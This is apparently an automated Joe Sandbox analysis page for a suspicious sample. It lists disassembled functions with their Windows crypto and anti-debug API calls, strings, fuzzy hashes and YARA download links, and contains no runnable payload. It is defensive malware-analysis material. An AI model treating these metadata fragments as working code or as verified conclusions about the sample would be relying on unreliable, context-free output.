Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: HandleModule$AddressBindProcRuntime__cftoe
String ID: mscorwks$v2.0.50727$wks
API String ID: 1312202379-2066655427
Opcode ID: df9775cfdee20438aa619448c071bf62f9d8250666a50ac67a04d9e43b540c81
Instruction ID: a39338e42a86a8faa1800b70ab10c7cb09f51f0f7f766506254c195f86c6f503
Opcode Fuzzy Hash: df9775cfdee20438aa619448c071bf62f9d8250666a50ac67a04d9e43b540c81
Instruction Fuzzy Hash: 7D9178B1E052999FCB04DFE8C9809AEBBB5FF49304F20866DE019EB740D734A945CB95

Uniqueness

Uniqueness Score: -1.00%

Function 6CE7DBB0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,CB65479A,6CEA8180,00000000,?), ref: 6CE7DBFB
GetLastError.KERNEL32 ref: 6CE7DC01
CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000008), ref: 6CE7DC15
CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000028), ref: 6CE7DC26
SetLastError.KERNEL32(00000000), ref: 6CE7DC2D

Part of subcall function 6CE7D9D0: GetLastError.KERNEL32(00000010,CB65479A,75A8FC30,?,00000000), ref: 6CE7DA1A

__CxxThrowException@8.LIBCMT ref: 6CE7DC78

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

Crypto++ RNG, xrefs: 6CE7DC0D, 6CE7DC20
CryptAcquireContext, xrefs: 6CE7DC35

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: AcquireContextCryptErrorLast$ExceptionException@8RaiseThrow
String ID: CryptAcquireContext$Crypto++ RNG
API String ID: 3279666080-1159690233
Opcode ID: 8c70ba43213b7ff8f0d329e186f5d80b48ab30af60942a02c1d191c4317d053d
Instruction ID: 4225a569bc94c35cbb31b87d04d06ec299acb8260957d12f03cc3e3196cdb482
Opcode Fuzzy Hash: 8c70ba43213b7ff8f0d329e186f5d80b48ab30af60942a02c1d191c4317d053d
Instruction Fuzzy Hash: C721A771248340AFD320DB69CC45F5B77F8AB49758F24091EF541A66C0EBB9E504CB66

Uniqueness

Uniqueness Score: -1.00%

Function 6CE8948B Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 6CE8CE6C
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6CE8CE81
UnhandledExceptionFilter.KERNEL32(6CEA9428), ref: 6CE8CE8C
GetCurrentProcess.KERNEL32(C0000409), ref: 6CE8CEA8
TerminateProcess.KERNEL32(00000000), ref: 6CE8CEAF

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: c70903e08e5e0176b8c255cd565a131e6b267d11e6089d0fbd99dd4c661610df
Instruction ID: d00038bfcea8cdf55f84d192176db481b3446c49f6039ccf036d281f1fdc812e
Opcode Fuzzy Hash: c70903e08e5e0176b8c255cd565a131e6b267d11e6089d0fbd99dd4c661610df
Instruction Fuzzy Hash: 7821F575F05204DFCF54DF6AD4846483BB4FB0A309F20512AE5A987B40EBB09B81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 6CE75DD0 Relevance: 6.4, APIs: 4, Instructions: 390COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f085bcd26588e23c15ff0e220fe3525c13c8c0a18fb92f868f6e0325a20ecbe
Instruction ID: b982dbb973a46d1047b4b28b39ea428810940b48e12f8453f1a0809a8cea5dc8
Opcode Fuzzy Hash: 6f085bcd26588e23c15ff0e220fe3525c13c8c0a18fb92f868f6e0325a20ecbe
Instruction Fuzzy Hash: 8402AE70A18394CFC754CF69C8A153EBBF1EBCA311F51092EE5FA57291C234A658CB26

Uniqueness

Uniqueness Score: -1.00%

Function 6CE75EB9 Relevance: 6.3, APIs: 4, Instructions: 318COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 6CE762FC
_memmove.LIBCMT ref: 6CE7632B
_memmove.LIBCMT ref: 6CE7635A
_memmove.LIBCMT ref: 6CE76389

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: ec7f1cb3340d19c96d2404c0cce0560869af07af261c97790863c54d42521af8
Instruction ID: 435470f93f347d46f83997fc2e0c766ec5613014898331955062ea2857413719
Opcode Fuzzy Hash: ec7f1cb3340d19c96d2404c0cce0560869af07af261c97790863c54d42521af8
Instruction Fuzzy Hash: BAE18070A18394CFC744CB69D8A153E7BF1EBCA211F41052EE6F6572A1D234A26DCB36

Uniqueness

Uniqueness Score: -1.00%

Function 07E50930 Relevance: 5.3, Strings: 4, Instructions: 336COMMON

Download Yara Rule

Strings

Gvq, xrefs: 07E50BBB
Gvq, xrefs: 07E50D19
LOOK, xrefs: 07E509B1
HERE, xrefs: 07E509B6

Memory Dump Source

Source File: 00000004.00000002.1921401699.0000000007E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7e50000_4854.jbxd

Similarity

API ID:
String ID: HERE$LOOK$Gvq$Gvq
API String ID: 0-802966049
Opcode ID: 961def360d48abbc16264bb7ded853fd8c027c3960a92d492e522f1cc0937c79
Instruction ID: 1ee580df07917a5509fe109230e069cb0ae4f72f2836eedb6c33db5fd6924547
Opcode Fuzzy Hash: 961def360d48abbc16264bb7ded853fd8c027c3960a92d492e522f1cc0937c79
Instruction Fuzzy Hash: F9F1A0B4E412298FDB64CF69C984BDDBBF1BB49310F1491E6E809A7351DB30AE818F50

Uniqueness

Uniqueness Score: -1.00%

Function 6CE7DE00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57encryptionCOMMON

Download Yara Rule

APIs

CryptGenRandom.ADVAPI32(?,?,?,CB65479A,00000000), ref: 6CE7DE6F
__CxxThrowException@8.LIBCMT ref: 6CE7DEB9

Part of subcall function 6CE7DD20: CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000000,6CE9F0E6,000000FF,6CE7DF67,00000000,?), ref: 6CE7DDB4

Strings

CryptGenRandom, xrefs: 6CE7DE7B

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Crypt$ContextException@8RandomReleaseThrow
String ID: CryptGenRandom
API String ID: 1047471967-3616286655
Opcode ID: 3a272d4dd939ea20a10865cb567ecbbbcb61492b7dbfc2804e4ba5feaf399de7
Instruction ID: 9151679afb78f3fc5b64284ac59431adddeb76fcd843c2cff13eb3fc7bd2ad90
Opcode Fuzzy Hash: 3a272d4dd939ea20a10865cb567ecbbbcb61492b7dbfc2804e4ba5feaf399de7
Instruction Fuzzy Hash: 362129755083409FD711DF64C444B9ABBF8BB89718F104A1EF86597B80D778E608CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6CE7D9D0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 126COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000010,CB65479A,75A8FC30,?,00000000), ref: 6CE7DA1A

Part of subcall function 6CE24010: std::_Xinvalid_argument.LIBCPMT ref: 6CE2402A

Strings

OS_Rng: , xrefs: 6CE7DA35
operation failed with error , xrefs: 6CE7DA49

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ErrorLastXinvalid_argumentstd::_
String ID: operation failed with error $OS_Rng:
API String ID: 406877150-700108173
Opcode ID: f586b0aa8c98510abbcedc8e633803fe56b184f07778a62fc011884a389fec79
Instruction ID: 8747ffda583c0c6f9175e988d30b6204a10e25f8665729dd53534ddd25ffba41
Opcode Fuzzy Hash: f586b0aa8c98510abbcedc8e633803fe56b184f07778a62fc011884a389fec79
Instruction Fuzzy Hash: 22418EB29083809FD320CF69C841B9BBBF8BB99704F24492EE19D87750DB759508CB67

Uniqueness

Uniqueness Score: -1.00%

Function 6CE7DEE0 Relevance: 1.6, APIs: 1, Instructions: 71encryptionCOMMON

Download Yara Rule

APIs

Part of subcall function 6CE24760: __CxxThrowException@8.LIBCMT ref: 6CE247F9

CryptReleaseContext.ADVAPI32(?,00000000,00000000,?), ref: 6CE7DF7B

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ContextCryptException@8ReleaseThrow
String ID:
API String ID: 3140249258-0
Opcode ID: ecca74d6f27424ed4d281e1543d2cce56183833e0969b3e7733b492848457aad
Instruction ID: b4b4acc6eb806c9d10931138f26eb16ee6fc6ef551c1a4b21e6e6d56d897ca91
Opcode Fuzzy Hash: ecca74d6f27424ed4d281e1543d2cce56183833e0969b3e7733b492848457aad
Instruction Fuzzy Hash: 2721AFB6508344AFC210DF15D840B4BBBF8EB9A768F640A1DF89583781D775E608CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6CE7DD20 Relevance: 1.6, APIs: 1, Instructions: 66encryptionCOMMON

Download Yara Rule

APIs

CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000000,6CE9F0E6,000000FF,6CE7DF67,00000000,?), ref: 6CE7DDB4

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ContextCryptRelease
String ID:
API String ID: 829835001-0
Opcode ID: 199bd111c77e7df3fe36f90ad94b5031b35059c4f85bec9e25e3521bdee5e44d
Instruction ID: 5a11a4debe3e31bf77419fa38bc49e256450f106ab1098851997cb8349046ef8
Opcode Fuzzy Hash: 199bd111c77e7df3fe36f90ad94b5031b35059c4f85bec9e25e3521bdee5e44d
Instruction Fuzzy Hash: F211D6B6B047505FE720CF58898075677F8E705658F280A3EED29C7B80EB79D604CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CEA35E0 Relevance: 1.5, APIs: 1, Instructions: 17encryptionCOMMON

Download Yara Rule

APIs

CryptReleaseContext.ADVAPI32(?,00000000), ref: 6CEA35F5

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ContextCryptRelease
String ID:
API String ID: 829835001-0
Opcode ID: 7734ae960a756daa3ae36be6601d8c3c0c77cfa757701feb19a2ae6feeb5ac09
Instruction ID: cc6f095046753ade633d3934c82c5a7839cc29179b4e559c9aed2c5d93baafec
Opcode Fuzzy Hash: 7734ae960a756daa3ae36be6601d8c3c0c77cfa757701feb19a2ae6feeb5ac09
Instruction Fuzzy Hash: 36D05EB2A021119BEE11CAA8A855B4632F85B02258F390020E914CF280DF64D5018B65

Uniqueness

Uniqueness Score: -1.00%

Function 6CE7D7F0 Relevance: 1.5, APIs: 1, Instructions: 17encryptionCOMMON

Download Yara Rule

APIs

CryptReleaseContext.ADVAPI32(?,00000000), ref: 6CE7D803

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ContextCryptRelease
String ID:
API String ID: 829835001-0
Opcode ID: cecc12c820c333964476b3dab6df11c6cabf158508ad54f446888e661304b093
Instruction ID: 43b3e9ccf365d777ed4716285855cee3c3acc866db6b916908c85e88dd972583
Opcode Fuzzy Hash: cecc12c820c333964476b3dab6df11c6cabf158508ad54f446888e661304b093
Instruction Fuzzy Hash: FAD02EB2B0225016E2309B54AC02B8777F80F00A08F35443EF44DC2780C6B4C440C3E9

Uniqueness

Uniqueness Score: -1.00%

Function 6CE7D7D3 Relevance: 1.5, APIs: 1, Instructions: 7encryptionCOMMON

Download Yara Rule

APIs

CryptReleaseContext.ADVAPI32(?,00000000), ref: 6CE7D7E0

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ContextCryptRelease
String ID:
API String ID: 829835001-0
Opcode ID: ade68e1dc9ab05ea32256ed79b6d2c94a4ae1605b2a85b336f3bb234567f8593
Instruction ID: 10c8d8ab58ecbb1d66dd05a0325ae4fa6790e3a67f2c06803a45f1d22b3f2e8c
Opcode Fuzzy Hash: ade68e1dc9ab05ea32256ed79b6d2c94a4ae1605b2a85b336f3bb234567f8593
Instruction Fuzzy Hash: 4AB012B4B123011FFD391A168F5871D19354B8120DE304509750160C488769D0009018

Uniqueness

Uniqueness Score: -1.00%

Function 6CE884B0 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 441fb02e479e70c25d9f464b40107eeb37156e062a0312b3e79404020245e575
Instruction ID: 63c71e7dcd03ea3bd400ec1d48d71774a627ac8ca5c214054b43554ecd1a0103
Opcode Fuzzy Hash: 441fb02e479e70c25d9f464b40107eeb37156e062a0312b3e79404020245e575
Instruction Fuzzy Hash: 9B115E72A09609EFC714CF59D841799FBF4FB45724F20867EE81993B80D735A900CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6CE96FB1 Relevance: 54.3, APIs: 36, Instructions: 344COMMONLIBRARYCODE

Download Yara Rule

APIs

operator+.LIBCMT ref: 6CE96FCC

Part of subcall function 6CE94147: DName::DName.LIBCMT ref: 6CE9415A
Part of subcall function 6CE94147: DName::operator+.LIBCMT ref: 6CE94161

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: NameName::Name::operator+operator+
String ID:
API String ID: 2937105810-0
Opcode ID: 5b62fed8693329d73517210b8dec6e13624238e115f48e3f6b250b2530f88537
Instruction ID: 879101862f737c75023b58fa1dd0b8ddf654f97aad05d2fe6ee0e515e8655b9b
Opcode Fuzzy Hash: 5b62fed8693329d73517210b8dec6e13624238e115f48e3f6b250b2530f88537
Instruction Fuzzy Hash: 98D133B5E00209AFDF10DFA8C891AEEBBF4EF05318F20416AE515E7750EB349A49CB51

Uniqueness

Uniqueness Score: -1.00%

Function 6CE8EC9D Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,6CE8A2D4,6CEB95C0,00000008,6CE8A468,?,?,?,6CEB95E0,0000000C,6CE8A523,?), ref: 6CE8ECA5
__mtterm.LIBCMT ref: 6CE8ECB1

